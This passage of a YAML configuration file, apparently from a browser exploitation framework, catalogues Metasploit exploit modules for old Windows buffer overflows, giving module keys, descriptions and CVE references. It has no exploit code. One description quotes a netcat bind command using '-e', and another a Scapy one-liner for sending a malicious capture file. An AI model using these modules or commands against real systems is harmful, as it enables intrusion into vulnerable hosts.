\t\t\t\tThis exploits a stack buffer overflow in the BigAnt Messaging Service,\n\
\t\t\t\tpart of the BigAnt Server product suite. This module was tested\n\
\t\t\t\tsuccessfully against version 2.52.\n\n\
\t\t\t\tNOTE: The AntServer service does not restart, you only get one shot.\n\
\t\t\t"
authors:
- - OSVDB
- "61386"
- - URL
- http://www.exploit-db.com/exploits/10765
- - URL
- http://www.exploit-db.com/exploits/10973
path: extensions/metasploit/
class: Msf_module
msf_asus_dpcproxy_overflow:
enable: true
msf: true
msf_key: windows/misc/asus_dpcproxy_overflow
name: Asus Dpcproxy Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Asus Dpcproxy version 2.0.0.19.\n\
\t\t\t\t\tIt should be vulnerable until version 2.0.0.24.\n\
\t\t\t\t\tCredit to Luigi Auriemma.\n\
\t\t\t"
authors:
- - CVE
- 2008-1491
- - OSVDB
- "43638"
- - BID
- "28394"
path: extensions/metasploit/
class: Msf_module
msf_ib_isc_create_database:
enable: true
msf: true
msf_key: windows/misc/ib_isc_create_database
name: Borland InterBase isc_create_database() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted create request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5243
- - OSVDB
- "38606"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_apple_quicktime_rtsp_response:
enable: true
msf: true
msf_key: windows/misc/apple_quicktime_rtsp_response
name: Apple QuickTime 7.3 RTSP Response Header Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Apple QuickTime 7.3. By sending an overly long\n\
\t\t\t\tRTSP response to a client, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-6166
- - OSVDB
- "40876"
- - BID
- "26549"
- - URL
- http://milw0rm.com/exploits/4648
path: extensions/metasploit/
class: Msf_module
msf_ms07_064_sami:
enable: true
msf: true
msf_key: windows/misc/ms07_064_sami
name: Microsoft DirectX DirectShow SAMI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the DirectShow Synchronized\n\
\t\t\t\tAccessible Media Interchange (SAMI) parser in quartz.dll. This module\n\
\t\t\t\thas only been tested with Windows Media Player (6.4.09.1129) and\n\
\t\t\t\tDirectX 8.0.\n\
\t\t\t"
authors:
- - CVE
- 2007-3901
- - OSVDB
- "39126"
- - MSB
- MS07-064
- - BID
- "26789"
path: extensions/metasploit/
class: Msf_module
msf_sap_2005_license:
enable: true
msf: true
msf_key: windows/misc/sap_2005_license
name: SAP Business One License Manager 2005 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the SAP Business One 2005\n\
\t\t\t\t\tLicense Manager 'NT Naming Service' A and B releases. By sending an\n\
\t\t\t\t\texcessively long string the stack is overwritten enabling arbitrary\n\
\t\t\t\t\tcode execution.\n\
\t\t\t"
authors:
- - OSVDB
- "56837"
- - CVE
- 2009-4988
- - BID
- "35933"
- - URL
- http://www.milw0rm.com/exploits/9319
path: extensions/metasploit/
class: Msf_module
msf_wireshark_packet_dect:
enable: true
msf: true
msf_key: windows/fileformat/wireshark_packet_dect
name: Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (local)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Wireshark <= 1.4.4.\n\
\t\t\t\tWhen opening a malicious .pcap file in Wireshark, a stack buffer overflow occurs,\n\
\t\t\t\tresulting in arbitrary code execution.\n\n\
\t\t\t\tNote: To exploit the vulnerability remotely with Scapy: sendp(rdpcap(\"file\"))\n\
\t\t\t"
authors:
- - CVE
- 2011-1591
- - OSVDB
- "71848"
- - URL
- https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838
- - URL
- https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836
- - URL
- http://www.exploit-db.com/exploits/17185
path: extensions/metasploit/
class: Msf_module
msf_hp_omniinet_3:
enable: true
msf: true
msf_key: windows/misc/hp_omniinet_3
name: HP OmniInet.exe Opcode 27 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the Hewlett-Packard\n\
\t\t\t\tOmniInet NT Service. By sending a specially crafted opcode 27 packet,\n\
\t\t\t\ta remote attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2011-1865
- - OSVDB
- "73571"
- - URL
- http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities
path: extensions/metasploit/
class: Msf_module
msf_agentxpp_receive_agentx:
enable: true
msf: true
msf_key: windows/misc/agentxpp_receive_agentx
name: AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a stack buffer overflow in the AgentX++ library, as used by\n\
\t\t\t\tvarious applications. By sending a specially crafted request, an attacker can\n\
\t\t\t\texecute arbitrary code, potentially with SYSTEM privileges.\n\n\
\t\t\t\tThis module was tested successfully against master.exe as included with\n\
\t\t\t\tRealNetworks' Helix Server v12. When installed as a service with Helix Server,\n\
\t\t\t\tthe service runs as SYSTEM, has no recovery action, but will start automatically\n\
\t\t\t\ton boot.\n\n\
\t\t\t\tThis module does not work with NX/XD enabled but could be modified easily to\n\
\t\t\t\tdo so. The address\n\
\t\t\t"
authors:
- - CVE
- 2010-1318
- - OSVDB
- "63919"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=867
path: extensions/metasploit/
class: Msf_module
msf_citrix_streamprocess:
enable: true
msf: true
msf_key: windows/misc/citrix_streamprocess
name: Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Citrix Provisioning Services 5.6.\n\
\t\t\t\tBy sending a specially crafted packet to the Provisioning Services server, a fixed\n\
\t\t\t\tlength buffer on the stack can be overflowed and arbitrary code can be executed.\n\
\t\t\t"
authors:
- - OSVDB
- "70597"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-11-023/
- - URL
- http://secunia.com/advisories/42954/
- - URL
- http://support.citrix.com/article/CTX127149
path: extensions/metasploit/
class: Msf_module
msf_landesk_aolnsrvr:
enable: true
msf: true
msf_key: windows/misc/landesk_aolnsrvr
name: LANDesk Management Suite 8.7 Alert Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in LANDesk Management Suite 8.7. By sending\n\
\t\t\t\tan overly long string to the Alert Service, a buffer is overwritten and arbitrary\n\
\t\t\t\tcode can be executed.\n\
\t\t\t"
authors:
- - CVE
- 2007-1674
- - OSVDB
- "34964"
- - URL
- http://www.tippingpoint.com/security/advisories/TSRT-07-04.html
path: extensions/metasploit/
class: Msf_module
msf_shixxnote_font:
enable: true
msf: true
msf_key: windows/misc/shixxnote_font
name: ShixxNOTE 6.net Font Field Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in ShixxNOTE 6.net.\n\
\t\t\t\tThe vulnerability is caused due to boundary errors in the\n\
\t\t\t\thandling of font fields.\n\
\t\t\t"
authors:
- - CVE
- 2004-1595
- - OSVDB
- "10721"
- - BID
- "11409"
path: extensions/metasploit/
class: Msf_module
msf_hp_omniinet_1:
enable: true
msf: true
msf_key: windows/misc/hp_omniinet_1
name: HP OmniInet.exe MSG_PROTOCOL Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in the Hewlett-Packard\n\
\t\t\t\tOmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n\
\t\t\t\tpacket, a remote attacker may be able to execute arbitrary code with elevated\n\
\t\t\t\tprivileges.\n\n\
\t\t\t\tThis service is installed with HP OpenView Data Protector, HP Application\n\
\t\t\t\tRecovery Manager and potentially other products. This exploit has been tested\n\
\t\t\t\tagainst versions 6.1, 6.0, and 5.50 of Data Protector, and versions 6.0 and 6.1\n\
\t\t\t\tof Application Recovery Manager.\n\n\
\t\t\t\tNOTE: There are actually two consecutive wcscpy() calls in the program (which\n\
\t\t\t\tmay be why ZDI considered them two separate issues). However, this module only\n\
\t\t\t\texploits the first one.\n\
\t\t\t"
authors:
- - CVE
- 2007-2280
- - BID
- "37396"
- - OSVDB
- "61206"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-09-099
path: extensions/metasploit/
class: Msf_module
msf_realtek_playlist:
enable: true
msf: true
msf_key: windows/misc/realtek_playlist
name: Realtek Media Player Playlist Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Realtek Media Player (RtlRack) A4.06.\n\
\t\t\t\tWhen a Realtek Media Player client opens a specially crafted playlist, an\n\
\t\t\t\tattacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-5664
- - OSVDB
- "50715"
- - BID
- "32860"
path: extensions/metasploit/
class: Msf_module
msf_talkative_response:
enable: true
msf: true
msf_key: windows/misc/talkative_response
name: Talkative IRC v0.4.4.16 Response Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Talkative IRC v0.4.4.16.\n\
\t\t\t\tWhen a specially crafted response string is sent to a client,\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "64582"
- - BID
- "34141"
- - URL
- http://milw0rm.com/exploits/8227
path: extensions/metasploit/
class: Msf_module
msf_borland_starteam:
enable: true
msf: true
msf_key: windows/misc/borland_starteam
name: Borland CaliberRM StarTeam Multicast Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Borland CaliberRM 2006. By sending\n\
\t\t\t\ta specially crafted GET request to the STMulticastService, an attacker may be\n\
\t\t\t\table to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-0311
- - OSVDB
- "44039"
- - BID
- "28602"
path: extensions/metasploit/
class: Msf_module
msf_eiqnetworks_esa_topology:
enable: true
msf: true
msf_key: windows/misc/eiqnetworks_esa_topology
name: eIQNetworks ESA Topology DELETEDEVICE Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in eIQnetworks\n\
\t\t\t\tEnterprise Security Analyzer. During the processing of\n\
\t\t\t\tlong arguments to the DELETEDEVICE command in the Topology\n\
\t\t\t\tserver, a stack-based buffer overflow occurs.\n\n\
\t\t\t\tThis module has only been tested against ESA v2.1.13.\n\
\t\t\t"
authors:
- - CVE
- 2006-3838
- - OSVDB
- "27528"
- - BID
- "19164"
path: extensions/metasploit/
class: Msf_module
msf_bigant_server:
enable: true
msf: true
msf_key: windows/misc/bigant_server
name: BigAnt Server 2.2 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in BigAnt Server 2.2.\n\
\t\t\t\tBy sending a specially crafted packet, an attacker may be\n\
\t\t\t\table to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-1914
- - OSVDB
- "44454"
- - BID
- "28795"
path: extensions/metasploit/
class: Msf_module
msf_fb_isc_create_database:
enable: true
msf: true
msf_key: windows/misc/fb_isc_create_database
name: Firebird Relational Database isc_create_database() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted create request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5243
- - OSVDB
- "38606"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_poppeeper_uidl:
enable: true
msf: true
msf_key: windows/misc/poppeeper_uidl
name: POP Peeper v3.4 UIDL Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in POP Peeper v3.4.\n\
\t\t\t\tWhen a specially crafted UIDL string is sent to a client,\n\
\t\t\t\tan attacker may be able to execute arbitrary code. This\n\
\t\t\t\tmodule is based on krakowlabs code.\n\
\t\t\t"
authors:
- - OSVDB
- "53559"
- - CVE
- 2009-1029
- - BID
- "33926"
- - URL
- http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_uidl-bof.txt
path: extensions/metasploit/
class: Msf_module
msf_ibm_tsm_cad_ping:
enable: true
msf: true
msf_key: windows/misc/ibm_tsm_cad_ping
name: IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service.\n\
\t\t\t\tBy sending a \"ping\" packet containing a long string, an attacker can execute arbitrary code.\n\n\
\t\t\t\tNOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order\n\
\t\t\t\tfor the vulnerable code to be reached. This state doesn't appear to be reachable when the\n\
\t\t\t\tTSM server is not running. This service does not restart.\n\
\t\t\t"
authors:
- - CVE
- 2009-3853
- - OSVDB
- "59632"
path: extensions/metasploit/
class: Msf_module
msf_bakbone_netvault_heap:
enable: true
msf: true
msf_key: windows/misc/bakbone_netvault_heap
name: BakBone NetVault Remote Heap Overflow
category: Metasploit
description: "\n\
\t\tThis module exploits a heap overflow in the BakBone NetVault\n\
\tProcess Manager service. This code is a direct port of the netvault.c\n\
\tcode written by nolimit and BuzzDee.\n\
\t\t\t"
authors:
- - CVE
- 2005-1009
- - OSVDB
- "15234"
- - BID
- "12967"
path: extensions/metasploit/
class: Msf_module
msf_hp_omniinet_4:
enable: true
msf: true
msf_key: windows/misc/hp_omniinet_4
name: HP OmniInet.exe Opcode 20 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability found in HP Data Protector's OmniInet\n\
\t\t\t\tprocess. By supplying a long string of data as the file path with opcode '20',\n\
\t\t\t\ta buffer overflow occurs when this data is written to the stack without\n\
\t\t\t\tproper bounds checking, which results in arbitrary code execution under the\n\
\t\t\t\tcontext of SYSTEM. This module also targets systems such as Windows Server 2003\n\
\t\t\t\tor Windows Server 2008 that have DEP and/or ASLR enabled by default.\n\
\t\t\t"
authors:
- - CVE
- 2011-1865
- - OSVDB
- "73571"
- - URL
- http://www.exploit-db.com/exploits/17468/
- - URL
- http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities
- - URL
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182
path: extensions/metasploit/
class: Msf_module
msf_eiqnetworks_esa:
enable: true
msf: true
msf_key: windows/misc/eiqnetworks_esa
name: eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in eIQnetworks\n\
\t\t\t\tEnterprise Security Analyzer. During the processing of\n\
\t\t\t\tlong arguments to the LICMGR_ADDLICENSE command, a stack-based\n\
\t\t\t\tbuffer overflow occurs. This module has only been tested\n\
\t\t\t\tagainst ESA v2.1.13.\n\
\t\t\t"
authors:
- - CVE
- 2006-3838
- - OSVDB
- "27526"
- - BID
- "19163"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
path: extensions/metasploit/
class: Msf_module
msf_tiny_identd_overflow:
enable: true
msf: true
msf_key: windows/misc/tiny_identd_overflow
name: TinyIdentD 2.2 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack based buffer overflow in TinyIdentD version 2.2.\n\
\t\t\t\tIf we send a long string to the ident service we can overwrite the return\n\
\t\t\t\taddress and execute arbitrary code. Credit to Maarten Boone.\n\
\t\t\t"
authors:
- - CVE
- 2007-2711
- - OSVDB
- "36053"
- - BID
- "23981"
path: extensions/metasploit/
class: Msf_module
msf_windows_rsh:
enable: true
msf: true
msf_key: windows/misc/windows_rsh
name: Windows RSH daemon Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in Windows RSH daemon 1.8.\n\
\t\t\t\tThe vulnerability is due to a failure to check the length of input sent\n\
\t\t\t\tto the RSH server. A CPORT in the range 512-1023 must be configured for the exploit\n\
\t\t\t\tto be successful.\n\
\t\t\t"
authors:
- - CVE
- 2007-4006
- - OSVDB
- "38572"
- - BID
- "25044"
path: extensions/metasploit/
class: Msf_module
msf_hp_omniinet_2:
enable: true
msf: true
msf_key: windows/misc/hp_omniinet_2
name: HP OmniInet.exe MSG_PROTOCOL Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in the Hewlett-Packard\n\
\t\t\t\tOmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n\
\t\t\t\tpacket, a remote attacker may be able to execute arbitrary code with elevated\n\
\t\t\t\tprivileges.\n\n\
\t\t\t\tThis service is installed with HP OpenView Data Protector, HP Application\n\
\t\t\t\tRecovery Manager and potentially other products. This exploit has been tested\n\
\t\t\t\tagainst versions 6.1, 6.0, and 5.50 of Data Protector, and versions 6.0 and 6.1\n\
\t\t\t\tof Application Recovery Manager.\n\n\
\t\t\t\tNOTE: There are actually two consecutive wcscpy() calls in the program (which\n\
\t\t\t\tmay be why ZDI considered them two separate issues). However, this module only\n\
\t\t\t\texploits the second one.\n\
\t\t\t"
authors:
- - CVE
- 2009-3844
- - BID
- "37250"
- - OSVDB
- "60852"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-09-091
path: extensions/metasploit/
class: Msf_module
msf_eureka_mail_err:
enable: true
msf: true
msf_key: windows/misc/eureka_mail_err
name: Eureka Email 2.2q ERR Remote Buffer Overflow Exploit
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a buffer overflow in the Eureka Email 2.2q\n\
\t\t\t\tclient that is triggered through an excessively long ERR message.\n\n\
\t\t\t\tNOTE: this exploit isn't very reliable. Unfortunately reaching the\n\
\t\t\t\tvulnerable code can only be done when manually checking mail (Ctrl-M).\n\
\t\t\t\tChecking at startup will not reach the code targeted here.\n\
\t\t\t"
authors:
- - CVE
- 2009-3837
- - OSVDB
- "59262"
- - URL
- http://www.exploit-db.com/exploits/10235
path: extensions/metasploit/
class: Msf_module
msf_netcat110_nt:
enable: true
msf: true
msf_key: windows/misc/netcat110_nt
name: Netcat v1.10 NT Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Netcat v1.10 NT. By sending\n\
\t\t\t\t\tan overly long string we are able to overwrite SEH. The vulnerability\n\
\t\t\t\t\texists when netcat is used to bind (-e) an executable to a port in doexec.c.\n\
\t\t\t\t\tThis module tested successfully using \"c:\\>nc -L -p 31337 -e ftp\".\n\
\t\t\t\t"
authors:
- - CVE
- 2004-1317
- - OSVDB
- "12612"
- - BID
- "12106"
- - URL
- http://www.milw0rm.com/exploits/726
path: extensions/metasploit/
class: Msf_module
msf_doubletake:
enable: true
msf: true
msf_key: windows/misc/doubletake
name: DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the authentication mechanism of\n\
\t\t\t\t\tNSI Doubletake which is also rebranded as HP Storage Works. This vulnerability\n\
\t\t\t\t\twas found by Titon of Bastard Labs.\n\
\t\t\t"
authors:
- - CVE
- 2008-1661
- - OSVDB
- "45924"
path: extensions/metasploit/
class: Msf_module
msf_borland_interbase:
enable: true
msf: true
msf_key: windows/misc/borland_interbase
name: Borland Interbase Create-Request Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Borland Interbase 2007.\n\
\t\t\t\tBy sending a specially crafted create-request packet, a remote\n\
\t\t\t\tattacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-3566
- - OSVDB
- "38602"
- - URL
- http://dvlabs.tippingpoint.com/advisory/TPTI-07-13
path: extensions/metasploit/
class: Msf_module
msf_bcaaa_bof:
enable: true
msf: true
msf_key: windows/misc/bcaaa_bof
name: Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102),\n\
\t\t\t\twhich comes as part of the Blue Coat Authentication proxy. Please note that by default,\n\
\t\t\t\tthis exploit will attempt up to three times in order to successfully gain remote code\n\
\t\t\t\texecution (in some cases, it takes as many as five times). This can cause your activity\n\
\t\t\t\tto look even more suspicious. To modify the number of exploit attempts, set the\n\
\t\t\t\tATTEMPTS option.\n\
\t\t\t"
authors:
- - OSVDB
- "72095"
- - URL
- https://kb.bluecoat.com/index?page=content&id=SA55
- - URL
- http://seclists.org/bugtraq/2011/Jul/44
path: extensions/metasploit/
class: Msf_module
msf_bopup_comm:
enable: true
msf: true
msf_key: windows/misc/bopup_comm
name: Bopup Communications Server Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460.\n\
\t\t\t\t\tBy sending a specially crafted packet, an attacker may be\n\
\t\t\t\t\table to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-2227
- - OSVDB
- "55275"
- - URL
- http://www.blabsoft.com/products/server
- - URL
- http://milw0rm.com/exploits/9002
path: extensions/metasploit/
class: Msf_module
msf_fb_svc_attach:
enable: true
msf: true
msf_key: windows/misc/fb_svc_attach
name: Firebird Relational Database SVC_attach() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted service attach request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5243
- - OSVDB
- "38605"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_ms05_030_nntp:
enable: true
msf: true
msf_key: windows/nntp/ms05_030_nntp
name: Microsoft Outlook Express NNTP Response Parsing Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the news reader of Microsoft\n\
\t\t\t\tOutlook Express.\n\
\t\t\t"
authors:
- - CVE
- 2005-1213
- - OSVDB
- "17306"
- - BID
- "13951"
- - MSB
- MS05-030
path: extensions/metasploit/
class: Msf_module
msf_nmap_stor:
enable: true
msf: true
msf_key: windows/novell/nmap_stor
name: Novell NetMail <= 3.52d NMAP STOR Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell's Netmail 3.52 NMAP STOR\n\
\t\t\t\tverb. By sending an overly long string, an attacker can overwrite the\n\
\t\t\t\tbuffer and control program execution.\n\
\t\t\t"
authors:
- - CVE
- 2006-6424
- - OSVDB
- "31363"
- - BID
- "21725"
path: extensions/metasploit/
class: Msf_module
msf_groupwisemessenger_client:
enable: true
msf: true
msf_key: windows/novell/groupwisemessenger_client
name: Novell GroupWise Messenger Client Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell's GroupWise Messenger Client.\n\
\t\t\t\tBy sending a specially crafted HTTP response, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-2703
- - OSVDB
- "46041"
- - BID
- "29602"
- - URL
- http://www.infobyte.com.ar/adv/ISR-17.html
path: extensions/metasploit/
class: Msf_module
msf_zenworks_desktop_agent:
enable: true
msf: true
msf_key: windows/novell/zenworks_desktop_agent
name: Novell ZENworks 6.5 Desktop/Server Management Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a heap overflow in the Novell ZENworks\n\
\t\t\t\tDesktop Management agent. This vulnerability was discovered\n\
\t\t\t\tby Alex Wheeler.\n\
\t\t\t"
authors:
- - CVE
- 2005-1543
- - OSVDB
- "16698"
- - BID
- "13678"
path: extensions/metasploit/
class: Msf_module
msf_ms04_045_wins:
enable: true
msf: true
msf_key: windows/wins/ms04_045_wins
name: Microsoft WINS Service Memory Overwrite
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits an arbitrary memory write flaw in the\n\
\t\t\t\tWINS service. This exploit has been tested against Windows\n\
\t\t\t\t2000 only.\n\n\
\t\t\t"
authors:
- - CVE
- 2004-1080
- - OSVDB
- "12378"
- - BID
- "11763"
- - MSB
- MS04-045
path: extensions/metasploit/
class: Msf_module
msf_xlink_nfsd:
enable: true
msf: true
msf_key: windows/nfs/xlink_nfsd
name: Omni-NFS Server Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Xlink Omni-NFS Server 5.2.\n\
\t\t\t\tWhen sending a specially crafted NFS packet, an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-5780
- - OSVDB
- "30224"
- - BID
- "20941"
- - URL
- http://www.securityfocus.com/data/vulnerabilities/exploits/omni-nfs-server-5.2-stackoverflow.pm
path: extensions/metasploit/
class: Msf_module
msf_safenet_ike_11:
enable: true
msf: true
msf_key: windows/vpn/safenet_ike_11
name: SafeNet SoftRemote IKE Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Safenet SoftRemote IKE IreIKE.exe\n\
\t\t\t\tservice. When sending a specially crafted udp packet to port 62514 an\n\
\t\t\t\tattacker may be able to execute arbitrary code. This module has\n\
\t\t\t\tbeen tested with Juniper NetScreen-Remote 10.8.0 (Build 20) using\n\
\t\t\t\twindows/meterpreter/reverse_ord_tcp payloads.\n\
\t\t\t"
authors:
- - CVE
- 2009-1943
- - OSVDB
- "54831"
- - BID
- "35154"
- - URL
- http://reversemode.com/index.php?option=com_content&task=view&id=63&Itemid=1
path: extensions/metasploit/
class: Msf_module
msf_putty_msg_debug:
enable: true
msf: true
msf_key: windows/ssh/putty_msg_debug
name: PuTTy.exe <= v0.53 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the PuTTY SSH client that is triggered\n\
\t\t\t\tthrough a validation error in SSH.c.\n\
\t\t\t"
authors:
- - CVE
- 2002-1359
- - OSVDB
- "8044"
- - URL
- http://www.rapid7.com/advisories/R7-0009.html
- - BID
- "6407"
path: extensions/metasploit/
class: Msf_module
msf_freesshd_key_exchange:
enable: true
msf: true
msf_key: windows/ssh/freesshd_key_exchange
name: FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a simple stack buffer overflow in FreeSSHd 1.0.9.\n\
\t\t\t\tThis flaw is due to a buffer overflow error when handling a specially\n\
\t\t\t\tcrafted key exchange algorithm string received from an SSH client.\n\
\t\t\t"
authors:
- - CVE
- 2006-2407
- - OSVDB
- "25463"
- - BID
- "17958"
path: extensions/metasploit/
class: Msf_module
msf_freeftpd_key_exchange:
enable: true
msf: true
msf_key: windows/ssh/freeftpd_key_exchange
name: FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a simple stack buffer overflow in FreeFTPd 1.0.10.\n\
\t\t\t\tThis flaw is due to a buffer overflow error when handling a specially\n\
\t\t\t\tcrafted key exchange algorithm string received from an SSH client.\n\
\t\t\t\tThis module is based on MC's freesshd_key_exchange exploit.\n\
\t\t\t"
authors:
- - CVE
- 2006-2407
- - OSVDB
- "25569"
- - BID
- "17958"
path: extensions/metasploit/
class: Msf_module
msf_securecrt_ssh1:
enable: true
msf: true
msf_key: windows/ssh/securecrt_ssh1
name: SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in SecureCRT <= 4.0\n\
\t\t\t\tBeta 2. By sending a vulnerable client an overly long\n\
\t\t\t\tSSH1 protocol identifier string, it is possible to execute\n\
\t\t\t\tarbitrary code.\n\n\
\t\t\t\tThis module has only been tested on SecureCRT 3.4.4.\n\
\t\t\t"
authors:
- - CVE
- 2002-1059
- - OSVDB
- "4991"
- - BID
- "5287"
path: extensions/metasploit/
class: Msf_module
msf_alphastor_agent:
enable: true
msf: true
msf_key: windows/emc/alphastor_agent
name: EMC AlphaStor Agent Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in EMC AlphaStor 3.1.\n\
\t\t\t\tBy sending a specially crafted message, an attacker may\n\
\t\t\t\tbe able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-2158
- - OSVDB
- "45714"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=702
path: extensions/metasploit/
class: Msf_module
msf_java_docbase_bof:
enable: true
msf: true
msf_key: windows/browser/java_docbase_bof
name: Sun Java Runtime New Plugin docbase Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a flaw in the new plugin component of the Sun Java\n\
\t\t\t\tRuntime Environment before v6 Update 22. By specifying specific parameters\n\
\t\t\t\tto the new plugin, an attacker can cause a stack-based buffer overflow and\n\
\t\t\t\texecute arbitrary code.\n\n\
\t\t\t\tWhen the new plugin is invoked with a \"launchjnlp\" parameter, it will\n\
\t\t\t\tcopy the contents of the \"docbase\" parameter to a stack-buffer using the\n\
\t\t\t\t\"sprintf\" function. A string of 396 bytes is enough to overflow the 256\n\
\t\t\t\tbyte stack buffer and overwrite some local variables as well as the saved\n\
\t\t\t\treturn address.\n\n\
\t\t\t\tNOTE: The string being copied is first passed through the \"WideCharToMultiByte\".\n\
\t\t\t\tDue to this, only characters which have a valid localized multibyte\n\
